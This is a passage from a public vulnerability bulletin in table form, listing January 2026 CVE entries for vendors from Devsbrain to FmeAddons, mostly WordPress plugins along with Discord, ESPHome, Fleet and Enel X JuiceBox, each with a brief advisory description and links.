| Devsbrain--Flex QR Code Generator | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Devsbrain Flex QR Code Generator flex-qr-code-generator allows DOM-Based XSS. This issue affects Flex QR Code Generator: from n/a through <= 1.2.8. | 2026-01-23 | not yet calculated | CVE-2026-24614 | https://patchstack.com/database/Wordpress/Plugin/flex-qr-code-generator/vulnerability/wordpress-flex-qr-code-generator-plugin-1-2-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Dimitri Grassi--Salon booking system | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Dimitri Grassi Salon booking system salon-booking-system allows Retrieve Embedded Sensitive Data. This issue affects Salon booking system: from n/a through <= 10.30.3. | 2026-01-22 | not yet calculated | CVE-2025-67954 | https://patchstack.com/database/Wordpress/Plugin/salon-booking-system/vulnerability/wordpress-salon-booking-system-plugin-10-30-3-sensitive-data-exposure-vulnerability?_s_id=cve |
| DioxusLabs--components | Dioxus Components is a shadcn-style component library for the Dioxus app framework. Prior to commit 41e4242ecb1062d04ae42a5215363c1d9fd4e23a, `use_animated_open` formats a string for `eval` with an `id` that can be user supplied. Commit 41e4242ecb1062d04ae42a5215363c1d9fd4e23a patches the issue. | 2026-01-23 | not yet calculated | CVE-2026-24474 | https://github.com/DioxusLabs/components/security/advisories/GHSA-34pj-292j-xr69 https://github.com/DioxusLabs/components/commit/41e4242ecb1062d04ae42a5215363c1d9fd4e23a |
| Discord--Client | Discord Client Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Discord Client. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the discord_rpc module. The product loads a file from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of a target user. Was ZDI-CAN-27057. | 2026-01-23 | not yet calculated | CVE-2026-0776 | ZDI-26-040 |
| Dmytro Shteflyuk--CodeColorer | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dmytro Shteflyuk CodeColorer codecolorer allows Stored XSS. This issue affects CodeColorer: from n/a through <= 0.10.1. | 2026-01-22 | not yet calculated | CVE-2025-68012 | https://patchstack.com/database/Wordpress/Plugin/codecolorer/vulnerability/wordpress-codecolorer-plugin-0-10-1-stored-cross-site-scripting-xss-vulnerability?_s_id=cve |
| docmost--docmost | Docmost is open-source collaborative wiki and documentation software. In versions 0.3.0 through 0.23.2, Mermaid code block rendering is vulnerable to stored Cross-Site Scripting (XSS). The frontend can render attacker-controlled Mermaid diagrams using mermaid.render(), then inject the returned SVG/HTML into the DOM via dangerouslySetInnerHTML without sanitization. Mermaid per-diagram %%{init}%% directives allow overriding securityLevel and enabling htmlLabels, permitting arbitrary HTML/JS execution for any viewer. This issue has been fixed in version 0.24.0. | 2026-01-21 | not yet calculated | CVE-2026-23630 | https://github.com/docmost/docmost/security/advisories/GHSA-r4hj-mc62-jmwj https://github.com/docmost/docmost/commit/cb9f27da9a8b4940760e37e5238a1eb91e427daf https://github.com/docmost/docmost/releases/tag/v0.24.0 |
| docopt.cpp--docopt.cpp | A signed integer overflow in docopt.cpp v0.6.2 (LeafPattern::match in docopt_private.h) when merging occurrence counters (e.g., default LONG_MAX + first user "-v/--verbose") can cause counter wrap (negative/unbounded semantics) and lead to logic/policy bypass in applications that rely on occurrence-based limits, rate-gating, or safety toggles. In hardened builds (e.g., UBSan or -ftrapv), the overflow may also result in process abort (DoS). | 2026-01-23 | not yet calculated | CVE-2025-67125 | https://gist.github.com/thesmartshadow/672afe8828844c833f46f8ebe2f5f3bd https://github.com/docopt/docopt.cpp |
| Doogee--Doogee | An OS command injection vulnerability in the com.sprd.engineermode component in Doogee Note59, Note59 Pro, and Note59 Pro+ allows a local attacker to execute arbitrary code and escalate privileges via the EngineerMode ADB shell, due to incomplete patching of CVE-2025-31710 | 2026-01-23 | not yet calculated | CVE-2025-67264 | http://doogee.com https://github.com/Skorpion96/unisoc-su/blob/main/CVE-2025-67264.md |
| Dotstore--Fraud Prevention For Woocommerce | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Dotstore Fraud Prevention For Woocommerce woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers allows Retrieve Embedded Sensitive Data. This issue affects Fraud Prevention For Woocommerce: from n/a through <= 2.3.1. | 2026-01-23 | not yet calculated | CVE-2026-24553 | https://patchstack.com/database/Wordpress/Plugin/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/vulnerability/wordpress-fraud-prevention-for-woocommerce-plugin-2-3-1-sensitive-data-exposure-vulnerability?_s_id=cve |
| dragonflyoss--dragonfly | Dragonfly is an open source P2P-based file distribution and image acceleration system. In versions 2.4.1-rc.0 and below, the Job API endpoints (/api/v1/jobs) lack JWT authentication middleware and RBAC authorization checks in the routing configuration. This allows any unauthenticated user with access to the Manager API to view, update and delete jobs. The issue is fixed in version 2.4.1-rc.1. | 2026-01-22 | not yet calculated | CVE-2026-24124 | https://github.com/dragonflyoss/dragonfly/security/advisories/GHSA-j8hf-cp34-g4j7 https://github.com/dragonflyoss/dragonfly/commit/9fb9a2dfde3100f32dc7f48eabee4c2b64eac55f |
| Dynamicweb--Dynamicweb | An issue was discovered in Dynamicweb before 9.12.8. An attacker can add a new administrator user without authentication. This flaw exists due to a logic issue when determining if the setup phases of the product can be run again. Once an attacker is authenticated as the new admin user they have added, it is possible to upload an executable file and achieve command execution. This is fixed in 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9.8, 9.10.18, 9.12.8, and 9.13.0 (and later). | 2026-01-23 | not yet calculated | CVE-2022-25369 | https://www.dynamicweb.com/resources/downloads?Category=Releases https://www.assetnote.io/resources/research/advisory-dynamicweb-logic-flaw-leading-to-rce-cve-2022-25369 |
| e-plugins--Final User | Missing Authorization vulnerability in e-plugins Final User final-user allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Final User: from n/a through <= 1.2.5. | 2026-01-22 | not yet calculated | CVE-2025-69187 | https://patchstack.com/database/Wordpress/Plugin/final-user/vulnerability/wordpress-final-user-plugin-1-2-5-broken-access-control-vulnerability?_s_id=cve |
| e-plugins--Final User | Incorrect Privilege Assignment vulnerability in e-plugins Final User final-user allows Privilege Escalation. This issue affects Final User: from n/a through <= 1.2.5. | 2026-01-22 | not yet calculated | CVE-2025-69293 | https://patchstack.com/database/Wordpress/Plugin/final-user/vulnerability/wordpress-final-user-plugin-1-2-5-privilege-escalation-vulnerability?_s_id=cve |
| e-plugins--fitness-trainer | Missing Authorization vulnerability in e-plugins fitness-trainer fitness-trainer allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects fitness-trainer: from n/a through <= 1.7.1. | 2026-01-22 | not yet calculated | CVE-2025-69188 | https://patchstack.com/database/Wordpress/Plugin/fitness-trainer/vulnerability/wordpress-fitness-trainer-plugin-1-7-1-broken-access-control-vulnerability?_s_id=cve |
| e-plugins--Hospital Doctor Directory | Missing Authorization vulnerability in e-plugins Hospital Doctor Directory hospital-doctor-directory allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Hospital Doctor Directory: from n/a through <= 1.3.9. | 2026-01-22 | not yet calculated | CVE-2025-68057 | https://patchstack.com/database/Wordpress/Plugin/hospital-doctor-directory/vulnerability/wordpress-hospital-doctor-directory-plugin-1-3-9-broken-access-control-vulnerability-2?_s_id=cve |
| e-plugins--Hospital Doctor Directory | Incorrect Privilege Assignment vulnerability in e-plugins Hospital Doctor Directory hospital-doctor-directory allows Privilege Escalation. This issue affects Hospital Doctor Directory: from n/a through <= 1.3.9. | 2026-01-22 | not yet calculated | CVE-2025-69183 | https://patchstack.com/database/Wordpress/Plugin/hospital-doctor-directory/vulnerability/wordpress-hospital-doctor-directory-plugin-1-3-9-privilege-escalation-vulnerability?_s_id=cve |
| e-plugins--Hospital Doctor Directory | Missing Authorization vulnerability in e-plugins Hospital Doctor Directory hospital-doctor-directory allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Hospital Doctor Directory: from n/a through <= 1.3.9. | 2026-01-22 | not yet calculated | CVE-2025-69186 | https://patchstack.com/database/Wordpress/Plugin/hospital-doctor-directory/vulnerability/wordpress-hospital-doctor-directory-plugin-1-3-9-broken-access-control-vulnerability?_s_id=cve |
| e-plugins--Hotel Listing | Missing Authorization vulnerability in e-plugins Hotel Listing hotel-listing allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Hotel Listing: from n/a through <= 1.4.2. | 2026-01-22 | not yet calculated | CVE-2025-68059 | https://patchstack.com/database/Wordpress/Plugin/hotel-listing/vulnerability/wordpress-hotel-listing-plugin-1-4-2-broken-access-control-vulnerability-2?_s_id=cve |
| e-plugins--Hotel Listing | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in e-plugins Hotel Listing hotel-listing allows Reflected XSS. This issue affects Hotel Listing: from n/a through <= 1.4.0. | 2026-01-22 | not yet calculated | CVE-2025-69056 | https://patchstack.com/database/Wordpress/Plugin/hotel-listing/vulnerability/wordpress-hotel-listing-plugin-1-4-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| e-plugins--Hotel Listing | Missing Authorization vulnerability in e-plugins Hotel Listing hotel-listing allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Hotel Listing: from n/a through <= 1.4.2. | 2026-01-22 | not yet calculated | CVE-2025-69185 | https://patchstack.com/database/Wordpress/Plugin/hotel-listing/vulnerability/wordpress-hotel-listing-plugin-1-4-2-broken-access-control-vulnerability?_s_id=cve |
| e-plugins--Institutions Directory | Missing Authorization vulnerability in e-plugins Institutions Directory institutions-directory allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Institutions Directory: from n/a through <= 1.3..4. | 2026-01-22 | not yet calculated | CVE-2025-68058 | https://patchstack.com/database/Wordpress/Plugin/institutions-directory/vulnerability/wordpress-institutions-directory-plugin-1-3-4-broken-access-control-vulnerability-2?_s_id=cve |
| e-plugins--Institutions Directory | Incorrect Privilege Assignment vulnerability in e-plugins Institutions Directory institutions-directory allows Privilege Escalation. This issue affects Institutions Directory: from n/a through <= 1.3.4. | 2026-01-22 | not yet calculated | CVE-2025-69182 | https://patchstack.com/database/Wordpress/Plugin/institutions-directory/vulnerability/wordpress-institutions-directory-plugin-1-3-4-privilege-escalation-vulnerability?_s_id=cve |
| e-plugins--Institutions Directory | Missing Authorization vulnerability in e-plugins Institutions Directory institutions-directory allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Institutions Directory: from n/a through <= 1.3.4. | 2026-01-22 | not yet calculated | CVE-2025-69184 | https://patchstack.com/database/Wordpress/Plugin/institutions-directory/vulnerability/wordpress-institutions-directory-plugin-1-3-4-broken-access-control-vulnerability?_s_id=cve |
| e-plugins--Lawyer Directory | Incorrect Privilege Assignment vulnerability in e-plugins Lawyer Directory lawyer-directory allows Privilege Escalation. This issue affects Lawyer Directory: from n/a through <= 1.3.3. | 2026-01-22 | not yet calculated | CVE-2025-67966 | https://patchstack.com/database/Wordpress/Plugin/lawyer-directory/vulnerability/wordpress-lawyer-directory-plugin-1-3-3-privilege-escalation-vulnerability?_s_id=cve |
| e-plugins--Lawyer Directory | Missing Authorization vulnerability in e-plugins Lawyer Directory lawyer-directory allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Lawyer Directory: from n/a through <= 1.3.3. | 2026-01-22 | not yet calculated | CVE-2025-67967 | https://patchstack.com/database/Wordpress/Plugin/lawyer-directory/vulnerability/wordpress-lawyer-directory-plugin-1-3-3-broken-access-control-vulnerability?_s_id=cve |
| e-plugins--Lawyer Directory | Missing Authorization vulnerability in e-plugins Lawyer Directory lawyer-directory allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Lawyer Directory: from n/a through <= 1.3.4. | 2026-01-22 | not yet calculated | CVE-2025-69181 | https://patchstack.com/database/Wordpress/Plugin/lawyer-directory/vulnerability/wordpress-lawyer-directory-plugin-1-3-4-broken-access-control-vulnerability?_s_id=cve |
| e-plugins--Listihub | Missing Authorization vulnerability in e-plugins Listihub listihub allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Listihub: from n/a through <= 1.0.6. | 2026-01-22 | not yet calculated | CVE-2025-69190 | https://patchstack.com/database/Wordpress/Theme/listihub/vulnerability/wordpress-listihub-theme-1-0-6-broken-access-control-vulnerability?_s_id=cve |
| e-plugins--ListingHub | Missing Authorization vulnerability in e-plugins ListingHub listinghub allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects ListingHub: from n/a through <= 1.2.7. | 2026-01-22 | not yet calculated | CVE-2025-69191 | https://patchstack.com/database/Wordpress/Plugin/listinghub/vulnerability/wordpress-listinghub-plugin-1-2-7-broken-access-control-vulnerability?_s_id=cve |
| e-plugins--Real Estate Pro | Missing Authorization vulnerability in e-plugins Real Estate Pro real-estate-pro allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Real Estate Pro: from n/a through <= 2.1.5. | 2026-01-22 | not yet calculated | CVE-2025-69192 | https://patchstack.com/database/Wordpress/Plugin/real-estate-pro/vulnerability/wordpress-real-estate-pro-plugin-2-1-5-broken-access-control-vulnerability?_s_id=cve |
| e-plugins--WP Membership | Missing Authorization vulnerability in e-plugins WP Membership wp-membership allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Membership: from n/a through <= 1.6.4. | 2026-01-22 | not yet calculated | CVE-2025-69193 | https://patchstack.com/database/Wordpress/Plugin/wp-membership/vulnerability/wordpress-wp-membership-plugin-1-6-4-broken-access-control-vulnerability?_s_id=cve |
| e-plugins--WP Membership | Incorrect Privilege Assignment vulnerability in e-plugins WP Membership wp-membership allows Privilege Escalation. This issue affects WP Membership: from n/a through <= 1.6.4. | 2026-01-22 | not yet calculated | CVE-2025-69292 | https://patchstack.com/database/Wordpress/Plugin/wp-membership/vulnerability/wordpress-wp-membership-plugin-1-6-4-privilege-escalation-vulnerability?_s_id=cve |
| Ecwid by Lightspeed Ecommerce Shopping Cart--Ecwid Shopping Cart | Missing Authorization vulnerability in Ecwid by Lightspeed Ecommerce Shopping Cart Ecwid Shopping Cart ecwid-shopping-cart allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Ecwid Shopping Cart: from n/a through <= 7.0.5. | 2026-01-23 | not yet calculated | CVE-2026-24580 | https://patchstack.com/database/Wordpress/Plugin/ecwid-shopping-cart/vulnerability/wordpress-ecwid-shopping-cart-plugin-7-0-5-broken-access-control-vulnerability?_s_id=cve |
| Ecwid by Lightspeed Ecommerce Shopping Cart--Ecwid Shopping Cart | Missing Authorization vulnerability in Ecwid by Lightspeed Ecommerce Shopping Cart Ecwid Shopping Cart ecwid-shopping-cart allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Ecwid Shopping Cart: from n/a through <= 7.0.5. | 2026-01-23 | not yet calculated | CVE-2026-24613 | https://patchstack.com/database/Wordpress/Plugin/ecwid-shopping-cart/vulnerability/wordpress-ecwid-shopping-cart-plugin-7-0-5-broken-access-control-vulnerability-2?_s_id=cve |
| Edge-Themes--Eldon | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Edge-Themes Eldon eldon allows PHP Local File Inclusion. This issue affects Eldon: from n/a through <= 1.0. | 2026-01-22 | not yet calculated | CVE-2025-69057 | https://patchstack.com/database/Wordpress/Theme/eldon/vulnerability/wordpress-eldon-theme-1-0-local-file-inclusion-vulnerability?_s_id=cve |
| Edge-Themes--Overworld | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Edge-Themes Overworld overworld allows PHP Local File Inclusion. This issue affects Overworld: from n/a through <= 1.3. | 2026-01-22 | not yet calculated | CVE-2025-69050 | https://patchstack.com/database/Wordpress/Theme/overworld/vulnerability/wordpress-overworld-theme-1-3-local-file-inclusion-vulnerability?_s_id=cve |
| Elated-Themes--Laurent | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elated-Themes Laurent laurent allows PHP Local File Inclusion. This issue affects Laurent: from n/a through <= 3.1. | 2026-01-23 | not yet calculated | CVE-2026-24609 | https://patchstack.com/database/Wordpress/Theme/laurent/vulnerability/wordpress-laurent-theme-3-1-local-file-inclusion-vulnerability?_s_id=cve |
| Elated-Themes--Laurent Core | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elated-Themes Laurent Core laurent-core allows PHP Local File Inclusion. This issue affects Laurent Core: from n/a through <= 2.4.1. | 2026-01-23 | not yet calculated | CVE-2026-24608 | https://patchstack.com/database/Wordpress/Plugin/laurent-core/vulnerability/wordpress-laurent-core-plugin-2-4-1-local-file-inclusion-vulnerability?_s_id=cve |
| Elated-Themes--Search & Go | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elated-Themes Search & Go search-and-go allows PHP Local File Inclusion. This issue affects Search & Go: from n/a through <= 2.8. | 2026-01-22 | not yet calculated | CVE-2025-69005 | https://patchstack.com/database/Wordpress/Theme/search-and-go/vulnerability/wordpress-search-go-theme-2-8-local-file-inclusion-vulnerability?_s_id=cve |
| Elated-Themes--Sweet Jane | Authorization Bypass Through User-Controlled Key vulnerability in Elated-Themes Sweet Jane sweetjane allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Sweet Jane: from n/a through <= 1.2. | 2026-01-22 | not yet calculated | CVE-2026-22426 | https://patchstack.com/database/Wordpress/Theme/sweetjane/vulnerability/wordpress-sweet-jane-theme-1-2-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Elated-Themes--Tbel | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elated-Themes Töbel tobel allows PHP Local File Inclusion. This issue affects Töbel: from n/a through <= 1.6. | 2026-01-22 | not yet calculated | CVE-2025-69049 | https://patchstack.com/database/Wordpress/Theme/tobel/vulnerability/wordpress-toebel-theme-1-6-local-file-inclusion-vulnerability?_s_id=cve |
| Elated-Themes--The Aisle | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elated-Themes The Aisle theaisle allows PHP Local File Inclusion. This issue affects The Aisle: from n/a through < 2.9.1. | 2026-01-22 | not yet calculated | CVE-2025-67941 | https://patchstack.com/database/Wordpress/Theme/theaisle/vulnerability/wordpress-the-aisle-theme-2-9-1-local-file-inclusion-vulnerability?_s_id=cve |
| Element Invader--Element Invader – Template Kits for Elementor | Missing Authorization vulnerability in Element Invader Element Invader – Template Kits for Elementor elementinvader allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Element Invader – Template Kits for Elementor: from n/a through <= 1.2.4. | 2026-01-22 | not yet calculated | CVE-2026-24386 | https://patchstack.com/database/Wordpress/Plugin/elementinvader/vulnerability/wordpress-element-invader-template-kits-for-elementor-plugin-1-2-4-broken-access-control-vulnerability?_s_id=cve |
| Enel X--JuiceBox 40 | Enel X JuiceBox 40 Telnet Service Missing Authentication Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Enel X JuiceBox 40 charging stations. Authentication is not required to exploit this vulnerability. The specific flaw exists within the telnet service, which listens on TCP port 2000 by default. The issue results from the lack of authentication prior to allowing remote connections. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-23285. | 2026-01-23 | not yet calculated | CVE-2026-0778 | ZDI-26-041 |
| esphome--esphome | ESPHome is a system to control microcontrollers remotely through Home Automation systems. In versions 2025.9.0 through 2025.12.6, an integer overflow in the API component's protobuf decoder allows denial-of-service attacks when API encryption is not used. The bounds check `ptr + field_length > end` in `components/api/proto.cpp` can overflow when a malicious client sends a large `field_length` value. This affects all ESPHome device platforms (ESP32, ESP8266, RP2040, LibreTiny). The overflow bypasses the out-of-bounds check, causing the device to read invalid memory and crash. When using the plaintext API protocol, this attack can be performed without authentication. When noise encryption is enabled, knowledge of the encryption key is required. Users should upgrade to ESPHome 2025.12.7 or later to receive a patch, enable API encryption with a unique key per device, and follow the Security Best Practices. | 2026-01-19 | not yet calculated | CVE-2026-23833 | https://github.com/esphome/esphome/security/advisories/GHSA-4h3h-63v6-88qx https://github.com/esphome/esphome/pull/13306 https://github.com/esphome/esphome/commit/69d7b6e9210390051318bd8e6410727689de08d6 https://esphome.io/guides/security_best_practices |
| Essekia--Tablesome | Missing Authorization vulnerability in Essekia Tablesome tablesome allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Tablesome: from n/a through <= 1.1.35.2. | 2026-01-23 | not yet calculated | CVE-2026-24524 | https://patchstack.com/database/Wordpress/Plugin/tablesome/vulnerability/wordpress-tablesome-plugin-1-1-35-2-broken-access-control-vulnerability?_s_id=cve |
| Event Espresso--Event Espresso 4 Decaf | Missing Authorization vulnerability in Event Espresso Event Espresso 4 Decaf event-espresso-decaf allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Event Espresso 4 Decaf: from n/a through <= 5.0.37.decaf. | 2026-01-22 | not yet calculated | CVE-2025-68007 | https://patchstack.com/database/Wordpress/Plugin/event-espresso-decaf/vulnerability/wordpress-event-espresso-4-decaf-plugin-5-0-37-decaf-settings-change-vulnerability?_s_id=cve |
| EVerest--everest-core | EVerest is an EV charging software stack. Prior to version 2025.12.0, `is_message_crc_correct` in the DZG_GSH01 powermeter SLIP parser reads `vec[vec.size()-1]` and `vec[vec.size()-2]` without checking that at least two bytes are present. Malformed SLIP frames on the serial link can reach `is_message_crc_correct` with `vec.size() < 2` (only via the multi-message path), causing an out-of-bounds read before CRC verification and `pop_back` underflow. Therefore, an attacker controlling the serial input can reliably crash the process. Version 2025.12.0 fixes the issue. | 2026-01-21 | not yet calculated | CVE-2025-68132 | https://github.com/EVerest/everest-core/security/advisories/GHSA-79gc-m8w6-9hx5 https://github.com/EVerest/everest-core/commit/b8139b95144e3fe0082789b7fafe4e532ee494a1 |
| ExpressTech Systems--Quiz And Survey Master | Missing Authorization vulnerability in ExpressTech Systems Quiz And Survey Master quiz-master-next allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Quiz And Survey Master: from n/a through <= 10.3.3. | 2026-01-22 | not yet calculated | CVE-2026-24358 | https://patchstack.com/database/Wordpress/Plugin/quiz-master-next/vulnerability/wordpress-quiz-and-survey-master-plugin-10-3-3-broken-access-control-vulnerability?_s_id=cve |
| expresstechsoftware--MemberPress Discord Addon | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in expresstechsoftware MemberPress Discord Addon expresstechsoftwares-memberpress-discord-add-on allows Reflected XSS. This issue affects MemberPress Discord Addon: from n/a through <= 1.1.4. | 2026-01-22 | not yet calculated | CVE-2025-68838 | https://patchstack.com/database/Wordpress/Plugin/expresstechsoftwares-memberpress-discord-add-on/vulnerability/wordpress-memberpress-discord-addon-plugin-1-1-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| external-secrets--external-secrets | External Secrets Operator reads information from a third-party service and automatically injects the values as Kubernetes Secrets. Starting in version 0.20.2 and prior to version 1.2.0, the `getSecretKey` template function, while introduced for senhasegura Devops Secrets Management (DSM) provider, has the ability to fetch secrets cross-namespaces with the roleBinding of the external-secrets controller, bypassing our security mechanisms. This function was completely removed in version 1.2.0, as everything done with that templating function can be done in a different way while respecting External Secrets Operator's safeguards As a workaround, use a policy engine such as Kubernetes, Kyverno, Kubewarden, or OPA to prevent the usage of `getSecretKey` in any ExternalSecret resource. | 2026-01-21 | not yet calculated | CVE-2026-22822 | https://github.com/external-secrets/external-secrets/security/advisories/GHSA-77v3-r3jw-j2v2 https://github.com/external-secrets/external-secrets/issues/5690 https://github.com/external-secrets/external-secrets/pull/3895 https://github.com/external-secrets/external-secrets/commit/17d3e22b8d3fbe339faf8515a95ec06ec92b1feb https://github.com/external-secrets/external-secrets/releases/tag/v1.2.0 |
| extremeidea--bidorbuy Store Integrator | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in extremeidea bidorbuy Store Integrator bidorbuystoreintegrator allows Reflected XSS. This issue affects bidorbuy Store Integrator: from n/a through <= 2.12.0. | 2026-01-22 | not yet calculated | CVE-2025-68883 | https://patchstack.com/database/Wordpress/Plugin/bidorbuystoreintegrator/vulnerability/wordpress-bidorbuy-store-integrator-plugin-2-12-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Farost--Energia | Unrestricted Upload of File with Dangerous Type vulnerability in Farost Energia energia allows Upload a Web Shell to a Web Server. This issue affects Energia: from n/a through <= 1.1.2. | 2026-01-22 | not yet calculated | CVE-2025-50002 | https://patchstack.com/database/Wordpress/Theme/energia/vulnerability/wordpress-energia-theme-1-1-2-arbitrary-file-upload-vulnerability?_s_id=cve |
| favethemes--Homey Core | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in favethemes Homey Core homey-core allows Reflected XSS. This issue affects Homey Core: from n/a through <= 2.4.3. | 2026-01-22 | not yet calculated | CVE-2025-67964 | https://patchstack.com/database/Wordpress/Plugin/homey-core/vulnerability/wordpress-homey-core-plugin-2-4-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| favethemes--Houzez Theme - Functionality | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in favethemes Houzez Theme - Functionality houzez-theme-functionality allows Stored XSS. This issue affects Houzez Theme - Functionality: from n/a through <= 4.2.6. | 2026-01-22 | not yet calculated | CVE-2026-24355 | https://patchstack.com/database/Wordpress/Plugin/houzez-theme-functionality/vulnerability/wordpress-houzez-theme-functionality-plugin-4-2-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| FireStorm Plugins--FireStorm Professional Real Estate | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in FireStorm Plugins FireStorm Professional Real Estate fs-real-estate-plugin allows Blind SQL Injection. This issue affects FireStorm Professional Real Estate: from n/a through <= 2.7.11. | 2026-01-22 | not yet calculated | CVE-2026-22470 | https://patchstack.com/database/Wordpress/Plugin/fs-real-estate-plugin/vulnerability/wordpress-firestorm-professional-real-estate-plugin-2-7-11-sql-injection-vulnerability?_s_id=cve |
| fleetdm--fleet | fleetdm/fleet is open source device management software. Prior to versions 4.78.2, 4.77.1, 4.76.2, 4.75.2, and 4.53.3, if Windows MDM is enabled, an unauthenticated attacker can exploit this XSS vulnerability to steal a Fleet administrator's authentication token (FLEET::auth_token) from localStorage. This could allow unauthorized access to Fleet, including administrative access, visibility into device data, and modification of configuration. Versions 4.78.2, 4.77.1, 4.76.2, 4.75.2, and 4.53.3 fix the issue. If an immediate upgrade is not possible, affected Fleet users should temporarily disable Windows MDM. | 2026-01-21 | not yet calculated | CVE-2026-22808 | https://github.com/fleetdm/fleet/security/advisories/GHSA-gfpw-jgvr-cw4j |
| fleetdm--fleet | Fleet is open source device management software. A broken access control issue in versions prior to 4.78.3, 4.77.1, 4.76.2, 4.75.2, and 4.53.3 allowed authenticated users to access debug and profiling endpoints regardless of role. As a result, low-privilege users could view internal server diagnostics and trigger resource-intensive profiling operations. Fleet's debug/pprof endpoints are accessible to any authenticated user regardless of role, including the lowest-privilege "Observer" role. This allows low-privilege users to access sensitive server internals, including runtime profiling data and in-memory application state, and to trigger CPU-intensive profiling operations that could lead to denial of service. Versions 4.78.3, 4.77.1, 4.76.2, 4.75.2, and 4.53.3 fix the issue. If an immediate upgrade is not possible, users should put the debug/pprof endpoints behind an IP allowlist as a workaround. | 2026-01-21 | not yet calculated | CVE-2026-23517 | https://github.com/fleetdm/fleet/security/advisories/GHSA-4r5r-ccr6-q6f6 https://github.com/fleetdm/fleet/commit/5c030e32a3a9bc512355b5e1bf19636e4e6d0317 |
| fleetdm--fleet | Fleet is open source device management software. In versions prior to 4.78.3, 4.77.1, 4.76.2, 4.75.2, and 4.53.3, a vulnerability in Fleet's Windows MDM enrollment flow could allow an attacker to submit forged authentication tokens that are not properly validated. Because JWT signatures were not verified, Fleet could accept attacker-controlled identity claims, enabling enrollment of unauthorized devices under arbitrary Azure AD user identities. Versions 4.78.3, 4.77.1, 4.76.2, 4.75.2, and 4.53.3 fix the issue. If an immediate upgrade is not possible, affected Fleet users should temporarily disable Windows MDM. | 2026-01-21 | not yet calculated | CVE-2026-23518 | https://github.com/fleetdm/fleet/security/advisories/GHSA-63m5-974w-448v https://github.com/fleetdm/fleet/commit/e225ef57912c8f4ac8977e24b5ebe1d9fd875257 |
| flexostudio--flexo-posts-manager | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in flexostudio flexo-posts-manager flexo-posts-manager allows Reflected XSS. This issue affects flexo-posts-manager: from n/a through <= 1.0001. | 2026-01-22 | not yet calculated | CVE-2025-52762 | https://patchstack.com/database/Wordpress/Plugin/flexo-posts-manager/vulnerability/wordpress-flexo-posts-manager-plugin-1-0001-cross-site-scripting-xss-vulnerability?_s_id=cve |
| FmeAddons--Registration & Login with Mobile Phone Number for WooCommerce | Missing Authorization vulnerability in FmeAddons Registration & Login with Mobile Phone Number for WooCommerce registration-login-with-mobile-phone-number allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Registration & Login with Mobile Phone Number for WooCommerce: from n/a through <= 1.3.1. | 2026-01-22 | not yet calculated | CVE-2025-69052 | https://patchstack.com/database/Wordpress/Plugin/registration-login-with-mobile-phone-number/vulnerability/wordpress-registration-login-with-mobile-phone-number-for-woocommerce-plugin-1-2-9-broken-access-control-vulnerability?_s_id=cve |
